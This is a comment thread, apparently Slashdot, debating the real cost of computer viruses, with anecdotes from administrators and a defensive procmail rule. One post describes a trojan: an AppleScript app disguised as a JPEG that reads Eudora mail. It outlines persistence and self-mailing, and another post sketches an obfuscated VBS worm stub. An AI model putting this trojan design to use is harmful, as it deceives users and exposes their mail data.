Re:Neither Macs nor *nix machines are immune

[Knobby]

Well, I use Macs. It's that simple.

When the "I Love You" hit I remember hearing a lot of mumbling about, users of Macs, Linux, BeOS, etc. being immune to .vbs worms.. Yep.. Sure, but the best part about worms like this current worm, and the I Love You virus, is that they're social worms.

To prove this. I wrote a little Applescript, compiled it into an App, altered the icon so it appeared to be a harmless photoshop .jpeg, then wrapped it up in a self-expanding stuff-it archive, and mailed it to a friend who had been ridiculing the 'dumb' windows crowd.. He immediately popped open the archive, and double clicked the harmless little icon.. You should've seen the look on his face, when a little window popped up on his screen with the sender info for every item in his Eudora inbox

if I were more malicious I would've let the Applescript install itself in the start-up items folder, then instruct photoshop (or even better would have been picture viewer) to display a simple image, while I parsed the Eudora's .mail files for the various info.. And you guys all thought the 'Summarize to Clipboard' was a useless feature.. Just wait until an Applescript for OS X shows up that runs as a background App, sumarizes the contents of the last note received from each unique address, and mails itself to the sender as a smart reply, as a *.gz, a *.pkg, or a stuff-it archive..

Re:Personal estimate..

[technos]

Oops. 17.1 billion..

Uhm, the damage incurred is not from the virus,

[Jailbrekr]

but from the open email clients that allow these little buggers to do the damage, and propagate like minks.......

I worked for a company that used Lotus Notes, and when the ILOVEYOU virus hit, there was only 1 instance of any damage being done, and it was easily reversable. The virus was not propogated within our network, our mail server was not overloaded to the point of crashing, and the damage that it *did* do (due to a user receiving and launching the .VBS script) was easily reversed (we were using Novell, so undeleting the deleted JPG files was a breeze).

Og that 18Billion dollars, how much of it is due to the virii, and how much is due to the shit mail servers on the market today?

the gov

[MoiTominator]

I'd like to know how much virii and similar attacks cost governments. Something that I pay for.

Re:the gov

[Homebrewed]

I'd like to know how much virii and similar attacks cost governments. Something that I pay for.

As a network administrator for a government agency, here's my take. I support 125 computers. I make a point to check my mail and the net several times daily to make sure the latest virus is (or isn't) out there. I have to spend time educating and re-educating 230 users about opening attachments. When we get hit by a virus (typically from a private-sector vendor-- we don't use Outlook...), I spend a day of my time running around dealing with panicked users. The 40-odd other admins where I work end up doing the same. Unfortunately, due to politics, the staff where I work get mail off an OpenVMS box, so there's no sendmail rules to kill it. The sparcs the other departments use have to have an admin modify rulesets. Plus, there's that $30K yearly site license we pay to Symantec....

Personally, I don't have this problem-- my desktop runs linux.

Re:How could it *not* cost a lot of money?

[jlb]

First, VBS files aren't the only viruses, they're only the examples I used. Additionally, email isn't the only way people get viruses, it's just the example I used.

As to yoursuggestion, in a large corporation that would be a *lot* of email for some admin to read, a full time job at least. Does a corporation really want some guy to read email to the CEO, CFO, COO and CTO?

Anyway, I'm not arguing that you can't prevent viruses. I'm arguing that THEY COST MONEY, prevention costs money and the occasional mistake costs a LOT of money. The article said they don't really see why viruses cost money and I was giving them the reasons why they do.

Re:Lost productivity

[Moooo+Cow]

While you're at it, why not do a comparison of the cost of electricity for two groups of people: those who live in the 21st century, and the Flintstones.

What's that? The cost of electricity is in the billions of dollars for the 21st century folks, but the cost for the Flintstones is zero!

Based on your brilliant logic, we should all live in the stone age, so our costs for this particular line item could be reduced to zero.

For the vast majority of computer users, their productivity using non-Windows tools would be reduced as surely as if they simply pulled the plug on their computer. Either way, their "cost" could be nothing - but that's only half the equation.

Re:The real cost of viruses...

[mgblst]

A popular spin-off: "Most stories on slashdot are published by trolls"

Re:Cost is higher than you think in some cases

[trog9000]

Business lost = all that customers future business

But don't forget, that business probably went to someone else, so the alternate vendor should be reporting a profit from not being hit by the virus, and the net cost to the industry(the $17billion mentioned in the article) should not count lost business...

A lot of respect,,,

[supabeast!]

Just a few moments ago, one of our sysadmins was stupid enough to run the Kournikova vbscript, and we will be making fun of him for months because of it.

Of course, the real downer was the idiot on our helpdesk who ran it and sent it to all of our customer contacts.

Re:The real cost of viruses...

[Amokscience]

You also need to factor in time for regular empoyees to check the validity of code/information. Not to mention the time they have lost. (This applies to hacker/cracker breakins as well)

Say you're developing the next Boeing aircraft and a virus sweeps through:

Maybe it has infected all machines. Maybe only some groups. You have to verify that the virus did not damage any critical files. Factor in the time that employees spend not working (even if all you do is a global backup restore) and the costs grow large. Imagine paying a few hundred engineers to do nothing for a couple days.

Re:I partially agree....

[duplicate-nickname]

However, the statistics cited are for:

costs to clean viruses from networks, servers, and client systems; restore lost or damaged files; and the lost productivity of workers caused by system outages and downtime.

How does prevention get included into this? In fact, the maintenance time for virus software and time spent responding to hoaxes and false alarms shouldn't be included in my total either.

Do you include the costs of condoms and birth control with those of raising a child?
But if I were impotent, I wouldn't need the birth control...
Well then, you wouldn't have the child either. Would you?
Yea, well if I used Linux...
Then you wouldn't even have a girlfriend...and that's what I call prevention.

I partially agree....

[duplicate-nickname]

We pay about $24 per client for anti-virus software, which include server/groupware protection. I would estimate that we only spend 2-3 hours a month (400 user base) maintaining virus software and responding to infections. However, I don't think one can include the cost of the antivirus software in your estimate. Even if there were to CIH, Melissa, or Love Bug, we would still be running the software. It's part of the total data protection plan that includes backups, UPS's, redundant servers and hardware, A/C in the server rooms, and fire protection.

So that's 2 hours per month at $40/hour ==> $960/yr for 400 users.

Re:I partially agree....

[rgmoore]

However, I don't think one can include the cost of the antivirus software in your estimate. Even if there were to CIH, Melissa, or Love Bug, we would still be running the software.

But this doesn't follow. If there were no viruses at all, you wouldn't need to worry about them as a source of data problems, and you wouldn't need to spend the $24 per client for anti-virus software. What that means is that the threat of a virus alone is enough to force you to add costs, so there's a cost associated with viruses even for well run shops that don't actually get infected. It's not a direct cost, but it still exists.

Re:OnTheFly Source

[AtrN]

It doesn't check the year so on Australia Day it does an HTTP get (Jan. 26 is Australia Day, may be a clue, most likely not).

Re:How much do virus *myths* cost businesses?

[Paradise_Pete]

So fixing something early turns it into a myth?

Virus Cost according to ICSA

[DeePCedure]

Peter Tippet, vice chairman and CTO of the International Computer Security Association (ICSA), gave keynote speach at the '98 International Virus Prevention Conference called "Virus Costs vs. Various Protection Strategies". The presentation was made available for download here (zip file). The presentation download included a spreadsheet with formulae and statistical data to calculate the quarterly or annual cost of virus activity for your enterprise.
Used in conjunction with the ICSA's annual Virus Prevalence Survey (available here) you should be able to update any '97 data and find out what viruses cost you today.
Both the IVPC presentation and the Virus Prevalence Survey are heavy on both statistics and supporting data.

Re:Virus cost:

[Jeppe+Salvesen]

Holy buckets! No wonder they're getting sued. 170 fresh ones for some good-looking piece of crap? Kind of like a novice crack-whore, i guess.

Cost depends on size...

[11thangel]

Well, the virus effects several things. Downtime required to restore from backup or clean the virus out. Lost money during that downtime. The lost money from any data lost between the last backup and attack time. Plus, the loss of respect due to being hit by the virus. If you are a small company, or the computer that is hit is not very important, losses will be minimal. But if your primary server goes down and you are a big corp, then if you dont have backups ready and in the loop (thank you round robin DNS) you'll be in big trouble. In short, big companies have the worry of losing more money and customers, but they wont have to worry anywhere near as much as a small company where that kind of loss can really do damage.

$17.1 Billion dollars??

[Mordred]

Well we've had some problem with viruses going around here at work, but they haven't cost us any actual business. I'm willing to bet they're more of an annoyance for most places rather than something which does serious damage.

Still I'm not going to dispute that $17.1 Billion figure. However I think a majority of that money is somehow being deposited into MacAfee, Norton, et al's pockets. That's the real cost of virii.

Mordred

Re:The real cost of viruses...

[Caspuh]

Even if the virus' didn't exist, you would still have to pay for the protection. The theoretical vulnerability is still there.

Re:You Realize...

[cyb3r0ptx]

"since many sites use this for clientside including of scripts"

What does that have to do w/ .js as an email attachment? using javascript source files on websites will not cause damage to a windows box like one executed from the client that has access to the registry and all other features of the os.

Virues cost us absolutley nothing.

[gmerideth]

In one full year with over 500+ viruses emailed into our networks, 492 of which were stopped at the fire wall the most a virus ever caused our 40 million dollar company was a wasted lunch time for me applying a drive image pro file on top of an infected machine.

17 billion in lost damages??? If the dummies would just spend 2 grand on good firewalls and antivirus programs then they wouldn't loose all that money.

Re:Hidden cost

[toga98]

We're a small company, but we got hit by the 'I Love You Virus'. We received it from one of our insurance agents and we didn't have an autoupdate facility enabled. My boss opened an email just as I got into work and was updating our email scanner, I clocked the time from my boss saying that his email (Outlook) was 'going wacky' (reading alert as he yelled) till I unplugged his ethernet at 45 secs via logs. We sent out 3 emails (Virii) and lost a thousand picture files on our file server due to this virus. We really didn't suffer much though by comparison. Replaced files from backup. Fixed three infected computers. Total time 2 hours including followup. This isn't much of a hassle for us, but I can't imagine how that would translate to a large organization. The impact has got to be tremendous. The cost has to be high on a global scale. We were lucky and are a lot better prepared now for intrusion. Some people just have to much free time on their hands.

Re:viruses cost me my sanity

[Woko]

Its my boss.
Except he spams the whole tech team with emails that are just web-pages of MRTG graphs saying 'I think this needs a bit of attention' when its not even relevant to 9/10 people on the list.

---

Re:I think...Marketing of fear=sales

[ericdano]

True. I think if maybe email servers would scan incomming message attachments and then flag them as being suspecious, and make that PLAIN AND CLEAR to a user, then we wouldn't have need for virus scan utilities.

I believe its a marketing hype. Like taking drug X to prevent some disease. No one can prove that drug X is going to prevent, but you can't disprove it either.

So, yeah, I think email server admins should rightly scan attachments for scripts and exe's, and if present, then make it CLEAR to the user that if they run it, it could be dangerous.......

But then again, how many people actually heed a warning, let alone read them?
--

I think...Marketing of fear=sales

[ericdano]

I think a lot of it is hype. You THINK you really need a virus protection program. You really probably don't. I have met so many people CONVINCED that they can get a virus. Honestly, I have NEVER had one on my *gasp* windows machine. And get all kinds of questionable programs and stuff all the time.

It's marketing, marketing fear to people who don't know anything about computers......
--

Re:I think...Marketing of fear=sales

[Skeeve]

I agree. I have been using Windows, and connected to the world at large through the Internet or before that, FidoNet, since 1991. In that time, I've gotten ONE trojan, and it was my own stupidity. No viruses, ever.

Re:I think...Marketing of fear=sales

[JohnSmith1138]

I somewhat agree. In work environments, virus checkers are a must. There is too much to lose in productivity and important files to risk not having a virus scanner. At home, I never run one. I don't have what I would consider "irreplaceable" (well ok, my save games would cause a little frustration at being lost, but they are only games) files at home and I don't like the performance hit and bugs that running a virus scanner causes. I have lost a motherboard due to CIH at home. Fried a bios on an older motherboard and the disk. I could get the disk back, but not the motherboard. At work just last month I received an e-mail from a client that had a virus in it. Their scanners were not up to date and it had infected about 5 computers. That was from opening an e-mail from a trusted source. It sometimes happens, you just need to assess the risk.

Re:I think...Marketing of fear=sales

[isorox]

About 4 or 5 years ago I wouldn't have agreed. I've lost a couple of disks to viruses. You could get some pretty nasty viruses if you knew where to look. Since the late 90's, with the Word Virus, and then these vbs viruses, You're pretty safe, and you're more likely to come to more harm installing things like McCaffe onto your windows computer (where do they get virus map data?).

Re:I think...Marketing of fear=sales

[ocbwilg]

I agree. An intelligent user who is familiar with precautions against virii will probably never be infected. Out of the 10+ years that I've been using MS OS's, I've only ever had a virus once. And that was long ago when a roommate of mine was bring home disks from work and using them on my PC. If you take reasonable precautions, you will be safe.

Unfortunately, the number of people in the world who fit the description above is approximately 12. Most end-users are so pig-headedly stupid that they wouldn't know a virus if it were wearing a neon sign around it's neck. We actually had one user at my company that opened 7 different messages that had the subject "I love you" on the day of the Love Bug outbreak. And this was that afternoon, when a high priority alert had been sent out by out AV response team that morning!

People are stupid. In the work environment, we have to try to protect them from themselves. Once they leave the office though, they're on their own.

How to Calculate Actual Cost

[bluemiracle]

It would have to include a number of factors, wouldn't it? Im sure man-hours would the prime cost, some physical cost for damaged chips, etc. But I still dont see where they could generate such a large number from a small, though viable, computer virus. First Post? :-P

Re:How to Calculate Actual Cost

[dr.g]

Actually, those salaries represent money SAVED by the company. And when we had the I Love You virus, we didn't have to re-install Windows on a single system. The people who opened the message a third time (I'm not kidding) were sacked, thus saving certain future "losses" they would likely have generated.

Generally, if a figure is generated by a party who stands to gain from fear and paranoia (M$, Symantec,NetAss), it is inflated. (Drug usage stats from the police, anyone?)

Re:How to Calculate Actual Cost

[cnkeller]

Chips??

You must be getting some really nasty viruses in your neck of the woods if they are damaging the chips (or even the firmware).

Re:How to Calculate Actual Cost

[Clubber+Lang]

Chips? Would that be bags of chips the sysadmins were snacking on, and then threw at the wall in anger? Or perhaps virus attacks in the UK cause people to spill their lunches and have their french fries hit the floor.

'Cause if you mean computer chips... widespread, multi-billion dollar hardware damage is a new one to me.

Re:How to Calculate Actual Cost

[Baumann]

Normally, the costs associated with a virus are measured in a combination of lost productivity, as well as the actual time spent undoing the damage. Assuming your IT department is not clueless (well, you are running winblows - one wonders) the actual impact can be minor, but not insignificant. Factors that would go into comuting the cost: 1) Cost of anti-virus software, after all, if there were no viruses, you wouldn't have to buy that crap. (At our company, I think this is on the order of 5K/yr) 2) Cost of system admin's time to either answer stupid questions when the virus software warns the user, and/or the luser actually runs the damn thing despite the warnings. [What part of 'don't run attachments from outside the company did you not understand?] For each virus that comes around, that usually gets us for 15-20 hours of work. 3) Lost engineering time while machines are fixed. This is the one that kills us. I'd say, on average, we wind up losing between 5 and 10K for each virus that hits the waves, but then we are fairly well protected. On the other hand, there are some places that may acutally be put out of business. Back in the days of the boot-sector virus, a legal firm I did some consulting for lost all soft copies of a few cases when one of their machines was wiped. [The secretary had removed the tape from the backup system because 'it made too much noise'] They figured their cost to recover from that was on the order of 50K in time spent putting the data back in, when they could have been doing something else]

Re:How to Calculate Actual Cost

[markmoss]

That was indeed a bone-headed over-reaction. But you do have to down the e-mail servers or whatever is spreading the virus immediately, otherwise the problem can get much worse in just minutes. So if you are doing it right, you've got a considerable cost in virus protection, and no cost in virus damages...

Re:How to Calculate Actual Cost

[statusbar]

One company I know of got hit hard by 'I love you'. 1000 people were told, "go home, don't come back for 3 days while we re-install windows on everyone's computers."

They were down for 3 full days.

3 days * 9 hours/day * 1000 people = 27000 hours.

More than half a million dollars lost just in salaries. That's just ONE company.

Re:How to Calculate Actual Cost

[statusbar]

Ha! good point!

Well I think they were scared and didn't understand exactly what it did. If I Love You was nastier they could have been required to do that.

Regardless, it cost them $$$$

Re:How to Calculate Actual Cost

[ocbwilg]

So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?

Procmail filter for *.vbs files

[josh_freeman]

If you have Sendmail set up to filter mail through procmail, this will store all files with a VBS attachment in a file of your choosing. I should probably make it send an email to the offending party and the intended recipient, but I haven't gotten around to it. Cheers

# Take all messages that have a vbs attachment and store them
:0 B
* ^Content-Disposition: attachment;|inline;
* filename=".*\.vbs"
/var/virii/virii #whatever directory is convenient

Hmm... Texas...

[JimTheta]

Hey, neat map! If you choose the Infected Files, Past 30 Days option, Texas is bright as a tomato. Not that I'm drawing any conclusions about Texans (whose former governor is, coincidentally, bright as a tomato!). On the other hand, California is also a bright red state, and that went to Gore... Darn. I was hoping I could draw a conclusion. Hey -- I can! There aren't any infected files in Nader states! -Grant aka JimTheta
---

Re:Chargeing Costs to OS developers

[sPaKr]

If you login as root, you deserve what you get. Every unix books says the first thing after install is to make your self a regular user account so you dont break shit. I guess you missed that chapter. It with almost no access control on the file system, complete lack of control of the memory map it is excatly the design of the OS that allows Virii to live. If we all used a proper access controls it would be almost impossible for a virus to spread. Of course this doesnt solve the macro virus/trojan problem, but hell if you your going to allow scripting/virtual machines to be a apart of a application you need to sandbox it, MS has yet to learn this.
Why do you need to have write access to word.exe, How often do you edit the binary? But you still have the ablitity to infect it. I would suggest that almost all of the excutables that get edited are from virii, upgrades and patches almost always just replace the entire file.
By design its difficult to spread a virus on unix. Most people that use unix arnt sitting at a root prompt.
Platform diveristy also hampers virii in unix. binary only virii, need to be compiled for the correct platfrom, *ix runs on several differnt platforms most unix shops use so many differnt versions that propgation would be difficult.
Not only a differnt binary but differnt file system layout, virii cant even make accurate assuptions about the file system layout if were to edit configuration data.
Writing a virus for unix is alot harder, then pile on top the difficulty in propgation, its a first step in solving this problem which MS keeps going just to keep an industry alive.

The whole argument not to fix windows or scrap it all toghter feels alot like the argument for parking enforcment. We pay to park, so some rent-a-cop can come buy and make sure we paid. Why not fire the cop, and make parking free?
Why not Kill windows, and watch the virus protection market die also

Also I wonder how many virii you have written. I have written them for dos/windows/macos and attempted a few for solaris/irix/linux. Real world test prove the unix virii are much less successful.

Chargeing Costs to OS developers

[sPaKr]

It seems to me that the reason we still are talking about virii is that MS still doesnt know how to write an OS that controls permissions. How many people have been hit by a virus on a *ix system ? Worse case is you dork your own files, but the chance of it spreading are far and few between. I mean in the last ten years you can count the number of virii/worms/trojans for *ix on one hand. Yet it seems that a new virus for an MS product comes out daily if not hourly. This leads me to suspect that even if MS could write a real OS they wouldnt. It would negate the virus scanning software market. How much money would Symantec loose if MS could write a real OS?. What ever the cost of a virus it should be charged to the developer of the application. Im sure the unix people have no problem with the cost wouldnt mean much, but in the MS world the numbers would hit the moon. It seems that we are artificialy producing an market segment. How many people will be pissed off when they learn that the only reason we are talking about virii is becouse MS is a full of a bunch of tards?

Re:Chargeing Costs to OS developers

[hypermatt99]

Man i've never heard such stupid statements. Do you realize that your a moron. Nothing about windows makes it easy for viri. The only reason there arent a lot of unix virus's cause less people use unix. A viri in unix could mess up a whole machine also cause most people that use a workstation log in with near root rights.

Re:The real cost of viruses...

[Saltine+Cracker]

You're assuming the cost of the system admin is the only cost we care about....

If the question is how much does it cost a company, one would have to look beyond the sysadmin. The last company I worked for was hit by "I love you" they were running MS Exchange, Outlook, and the rest of the M$ software. Email is email and it's not all that important right? Wrong. One person opens the wrong email, BAM, your server is sending so many emails that within minutes it will have crashed. Anyone else who logs into that client system will start that process over. Any person who logged into the infected system and logs into another system will start that process over.

Hopefully, none of your customer's email addresses were stored in the address book of that infected system. The PR nightmare that occurred because we sent "I Love You" to several customers was horrible. We lost one, and another who was one of our biggest supporters, decided not to let our prospective customers call them for referral.

In all we system admins only spent about 32 hours cleaning up the virus and the resulting email server crashes.

The cost the company assumes when a virus hits can be huge. Workstation downtime, Server downtime, Sysadmin/firefighter work, Customer Relations and Image issues that result. In all it can be very expensive.

Some of those costs are difficult to mathematically account for. Especially when it comes to the value a single customer has.

How do you calculate lost WASTED time?

[Ronin+X]

If a vb script virus is transmitted by someone opening an 'I love you' or 'AnnaKournekova.jpg' how much productivity are you REALLY losing? They just don't have as much time to waste. I suppose it could have a terrible impact on morale...

Viruses and Money

[Adam+Jenkins]

I think the real question is how much do anti virus companies "mis-judge" how big a virus will be when they do their big usually wildly inaccurate PRs to CNN etc. If there are thousands of companies who've just spent $000s on antivirus software, how many IT staff will then turn around and say "er well, hardly anyone got the virus anyway, we just wasted your money Mr/Ms CEO"? It will be patting of backs and "Phew, lucky we spent all this money!". So then is that still a cost, given that they would not have got the virus anyway?
--
Never try to teach a pig to sing. It wastes your time and annoys the pig.

Virus Scanner and a Clued-in-SysAdmin

[Aquakened]

I'd say that we pay about $500/head/year for virus software, and about $300/head/year for a more compatent sysadmin to do good updating and user education. Nothing compared to what being brainwashed by Microsoft is costing us. Matter of fact, I'd say that Microsoft brainwashing probably costs us $4000/head/year if not more. (And that's not even counting crashes and reboots.) So IMHO, the only virus that is really nasty might me a virus of the mind.

No virus metrics exist

[ErfC]

Nobody actually knows how much viri cost, because nobody records any data about the viri or their activities. (See this article at VMyths.com for a good discussion.) All these numbers are estimated from anecdotal evidence; a lot of the damage comes from "preventative measures" (like shutting down your entire email server for two days so some virus doesn't come along and shut down your email server); and a good chunk of these numbers come from other press reports, which get them from other press reports, which get them from people who were "estimating" (read: making them up) on the spot.

-Erf C.

fallacious to say that viruses don't cost anything

[washirv]

There are many posts here that try to argue that just because you have sysadmins whose job it is to keep backups of data and networks virus free, and because people spend some time of the day not working, there is really no cost to businesses from virus attacks. This is a ridiculous argument of course. Just because your business doesn't mind your browsing slashdot when you're supposed to be working, doesn't mean that it is not costing the business anything because you're browsing the web instead of working. The same thing goes for the sysadmin who has to spend her time getting the company's computers and network back on track after a nasty virus attack. Just because that's her job doesn't make the cost unreal. It could be that there are other things she ought to be doing at the time.

Washington Irving

Money Loss

[bdigit]

In my company alone we lost 17.1 billion dollars in the year 2000. No im not just saying the number that was said in the article.

Re:Money Loss

[AndyMouse+GoHard]

Moderators... mod this up. It's funny.

Re:Stupidity

[hidden]

This map is SO useless... since it's not per capita, or per computer, or something, it really doesn't mean anything...

lies, damn lies, and statistics

[geekoid]

used to be the three types of lies, but now there's a forth:
wild guess based on nothing to support hysteria in the computer industry.
ok its too wordy, but its the truth.
Since there is no way to find out how much it costs, how many computers where hit, is the user losing productivity time, or are they loosing "surfing" time?
Its the same thing when industry talking about "cracking" or "piracy".
I was watching channel 11 here in Orange county, ca. and they did a story on "computer cracking". One guy in the industrys stated that 50% of all software people use is illegal!
where does that number come from? they made it up. and then they use that MADE UP number and multiply it by the retail cost of there software and then boo hoo about there "loss" even though they never report that "loss" to there share holders. hhmmmmm.
I think writing a paper on how the computer industry comes up with these numbers would be darn interesting.

Re:OnTheFly Source

[MrPotatoeHead]

it seems that if the script is run on jan 26th, the script loads up the www.dynabyte.nl site...

Shameless satire

[hardburn]

Cost of the average anti-virus program: $50
Cost of blocking .vbs attachments: $0
Cost of your PHB opening .vbs attachment: A lot of time that could be spent playing Quake
Cost of hitting your PHB with a cluestick: Your job
Cost of knowing your OS is immune: Priceless.

------

Medium scale system estimated costs

[buss_error]

OK, I have about 12,000 nodes this year (add 4,000 by the end of the year), at an average cost of $4 per pc for Anti-virus, about 200 servers at a cost of $50 per server, plus the OT to have the techs go fix the virus scan software they installed incorrectly at estimated $15,000.00, plus 1 full time sys admin type (It's actually 3 people 1/3 time per day)at 51,000.00 per year, for a total of ... 42. Yep, that's the cost of Virii at where I work. Of course, I used a Microsoft Calculator to add it all up. (Using my RED HAT calculator, it's more like $124,000.00 per year).

Now, let's add in the cost of the time it took to re-enter the data lost to those virii that got through, by virtue of being too new or on systems whose users turned off anti-virus because it took too long to boot.... and now, lets add in the cost of waiting for those 12,000 nodes to boot up with anti-virus vs. no anti-virus, the time to replicate 12,000 files to each workstation (we actually do it in a script/batch), blah blah blah. As a guess I'd say the total cost to us is around $200,000 to $250,000 per year lost/spent due to virii.

real cost

[avandesande]

I don't think virus cost nearly that much. Most cubicle dwellers have quite a bit of extra time on their hands, and if a virus takes away from this 'free' time it doesn't cost anything.
Someone should do a study to see if IM traffic or Slashdot posts goes down when there is a virus outbreak.

The real question

[jessh]

The real question is how much money do "Anti-Virus" companies make off of virus?

Why don't you ask ...

[vieux+schnock]

... Rob Rosenberger. He is the owner of Vmyths.com, the site about computer virus hoaxes and myths. He's been dealing for years with stories about threats or outbursts of viruses. Maybe he has insights on the alleged cost of these attacks.

Nothing!

[Clyde]

They cost nothing if you don't use recent M$ products. ;)

Re:"Loss" == "IRS allows you to write it off".

[Brolly]

You know, when the analogy is not made in the general favor of the majority of slashdot, I've often seen people complaining that software value or whatever should not be compared to real life hard stuff....

At least one figure can be accurate

[djrogers]

The cost of AV software, on the desktop, on the servers, and on the firewalls is directly related to virus attacks, thus that figure can be easily included in the calculations. The gross income of companies such as Trend Micro, McAfee, and Norton is mostly from the sale of AV licenses / updates, and I'm sure it would be a simple matter of a phone call to Investor Relations at each company to get exact figures related to such sales.
As stated by others, the rest - time, lost productivity, etc is harder to calculate, but at least you'll get part of it accurately.

the real cost of a virus...

[brad3378]

...Depends on who you ask.

Microsoft response:
Bah Humbug!!! Our products are so good you don't even have to worry about viruses.

Symmantec response:
How much money do you have???

I don't know how much it *really* costs...

[xtmwx]

but I do know I made $450 today updating Outlook 98/2k for a small company. wah wah

We got a virus today at work. . . .

[ishpeck]

. . . .we killed the person who propigated it. . .

NOTHING!!!

[spyrral]

You get them for free from other people!

Re:The real cost of viruses...

[njyoder]

Just a thought here. But doesn't it seem odd that ever 6 months to a year there is a really big email style virus that hits a large majority of the "not so bright" people out there?

Don't make the automatic assumption that the person is "not so bright" simply because they caught a virus. It is like a car mechanic calling someone who brought their damaged car in for repairs "not so bright" because they couldn't repair themself; or even better a doctor calling a patient not so bright for getting infected by a biological virus (where the doctor knew how to avoid it).

The simple matter is that many people use computers as tool to help them with their job, which may not related to computers, so it is inappropriate to call them "not so bright" for being ignorant on a subject that is un-related to their area of expertise/interest.

Consider the affect on small businesses.

[BillyZ]

One of our genius sales reps opened an attachment in his email which promptly fried his network connection and bluescreened his laptop. The company i work for is rather small. So apart from being a developer, we are also called apon to be tech support. So my time, which is billed out at about $100 - $150 (US) an hour to our clients is pretty valuable around here. Granted, the gentleman involved did not have any antivirus software installed and that would have prevented the issue, BUT, as many a million i'm sure don't have it installed, this is part of why the "cost of viruses" is so high. Because of this virus I spent the better part of the day trying to clean up his machine and get him back on the network. Probably a good 3-4 hours. That 3-4 hours was also time that he was not able to work because he did not have access to his files, contacts etc. so that now takes us up to 6-8 man hours. In this case the following was not true, but consider the possability that the infected machine was preventing the completetion of an immediate deadline. taking 3-4 hours of time to rectify the situation could put the whole project back 3-4 hours perhaps requireing 4 or 5 people to have to wait 3-4 hours for the situation to be resolved. So i think you can see how even a small instance of a virus in a small company could easily generate thousands of dollars in loss. By loss i mean time spent "on the clock" that the company had to pay me for that was not productive towards a clients goal.

So the "cost" of the virus in the most part, stems from a lack of prevention. if every machine in the world had antivirus software and the virus definition files are rutinly updated, I would guess that at least %90 of that cost would disappear. However No matter how often you update your software though, there is still the chance of catching a new strain of a virus so the cost will never disappear entirely.

another thought. the fact that someone even HAS to buy antivirus software and pay for update subscriptions at all is due to the fact that there even ARE virusus. I would consider that to be included in the "cost". If there were no virusus, we would not have to spend $40 on a copy of McAfee. And $40 per copy of the software, times a company of 500 machines (a small comapny when you consider things on a global scale) is $20,000...

Re:viruses cost me my sanity

[_SIGKILL_]

That's why Ritchie built /dev/null. Just setup a filter...

Add up the values of all the anti virus companies.

[heytal]

And what you get is a fair estimate.. Add to it the time lost, the man hours spent in manning those anti virii, and the figures are HUGE..

Viruses aren't the problem..

[ameoba]

(Essentially this is an NRA "Guns don't kill people argument..)

The way I see it is that most virus problems are a direct result of cluless users not practicing common sense. If it weren't for viruses, there would be some other way that they would mess up the system. Virus or no, computer support personel -always- have their time full.

The fatal flaw

[Coops222]

All these estimates for the cost of virus cleanup, web surfing on the job, etc. have a fatal flaw in the calculation. They assume if people aren't doing the undesirable activity they would be doing the ideal alternative 100% of the time.

Humans take breaks. Humans often fill break time with some the other things they have queued up. Some examples of filler tasks are: cleaning up after viruses and web surfing.

Software piracy provides an even more glaring example of excessive cost allocation. I would confidently guess that most illegitimate copies of software would not be replaced by legitimate ones if piracy magically disappeared. Yet when experts calculate this cost they assign 100% value to each unlicensed copy, as if each would otherwise be licensed at the full price.

Dumb.

Way too simplistic of a model

[InsaneGeek]

Your model assumes that the backup would be able to restore to the exact moment people were working at. We have over a hundred developers here, and if something bad were to happen to our devel environment (admins had a pc-nfs mount somewhere bad), if we where to throw out half the developers (for as you say breaks, etc) and luckily be out only 4 hours from the last backup... (which actually tends to be 8 hours for most places, others do it hourly, or every other hour)

50 workers * 4 hours = 200 lost man hours just for the developers to replace what they did since last backup + however long developers have to sit on their thumbs while the restore occurs + all the rest of the things (time diverted from other projects, etc.) you end up with a lot of time.

Your model mimics the old joke email 260 million people in the US, 114mil retired, 93 mil in school... 206,000 in hospitals... leaving only one person doing all the work.

Re:Plural of "virus"

[Golias]

Yes, and the correct plural of "box" is "boxes", but a lot of geeks like to say "boxen".

Playing with the language is common dry geek humor. (You can find plenty of Jargon File entries about this if you take the time to look.)

Some people amuse themselves by saying "virii". Get over it.

Re:The real cost of viruses...

[Golias]

It's actually an old conspiracy theory.

"Most viruses are made by the anti-virus industry."

A popular spin-off: "Most free porn on the internet is published by the makers of filter software."

Very amusing to think so, but there are enough scipt kiddies and porno distributers out there that there is really no need. Why spend your own resources creating the "problem" that sells your product, when so many people are doing it for you for free?

Look for a Jon Katz article about The Rise of the Open Source Conspiracy Method sometime soon. :)

Re:Read what you post?

[Golias]

Then the singular form must be "virum". :)

$720,000

[zTTTz]

That is the total cost for our networking department's salaries since our first infection (installation) to maintain, troubleshoot, and install Microsoft Windows.

The Problem is prevention and education.

[noahbagels]

My past two companies had their exchange servers overloaded and subsequently taken offline for several days.

Cost to company: No dumb powerpoints for a few days!.

The engineers who accounted for the majority of revenue at both firms, were able to continue working with less interruption from marketing weenies for hours on end. Our meetings went smoothly without M$ Project / Powerpoint files distributed by email.

At both companies, the IT departments were completely ill-prepared to deal with such problems.
In fact, Power outages at both firms over 6 months ago (not related to current CA power funkiness), knocked out email and fileservers because of our IT department's small budget and poorly trained staff.

Bottom line: Find, Pay, Train, and Retain good IT staff, and fund them well enough to keep the business running.
PG&E working down the street shouldn't disable engineering fileservers for a few days due to inadequate backups, nor should virii.

F$CK the client side virus scanners that bog down our systems. Our entire engineering team uninstalled the binaries for Sophos anti-virus / productivity-nullifier after out IT team remote-installed it, and it took up > 30% of all available cpu cycles and all disk cycles - even during development!

Re:How could it *not* cost a lot of money?

[Nos.]

I see your point, but it IS a preventable cost. Good user training goes a long way. We have a lot of roaming users (laptop with dial in) and we stress saving their work to the network when dialed in. This isn't just to protect against virii, but also hardware failures, lost/stolen machines, etc.

I work for a federal gov't department in Canada, and our region has recently put one of our CS group in a Train-the-Users position. It has substantially reduced help desk calls, resulting in more time to do preventative maintenance, not too mention solving real problems.

Re: How Much Do Computer Virus Attacks Really Cost

[jchristl]

Plenty, I say. The bigger the company the bigger the cost. The company I work for has paid well over 10's of thousands of dollars on Anti-virus licenses alone!!!

Not to mention the mandatory email outages when a new macro virus hits, and who knows what background costs that affects...

Don't get me started

[AintTooProudToBeg]

Here in Los Angeles (310 area code), PacBell started requiring people to dial 1-310-xxx-xxxx even when dialing local numbers. People claimed that this cost companies millions of dollars in wasted productivity. After about 6 months of hearing complaints, PacBell backed off.

Re:OnTheFly Source

[zootie]

Indeed, the original source is something like

'Vbs.OnTheFly Created By OnTheFly
Execute e7iqom5JE4z("encoded code")

Function e7iqom5JE4z(hFeiuKrcoj3)
' Code to decode the string and return it
End Function

It is rather simple, but effective... I modified the script so It would write the decoded string in the original post into a file...

the real cost

[wobblie]

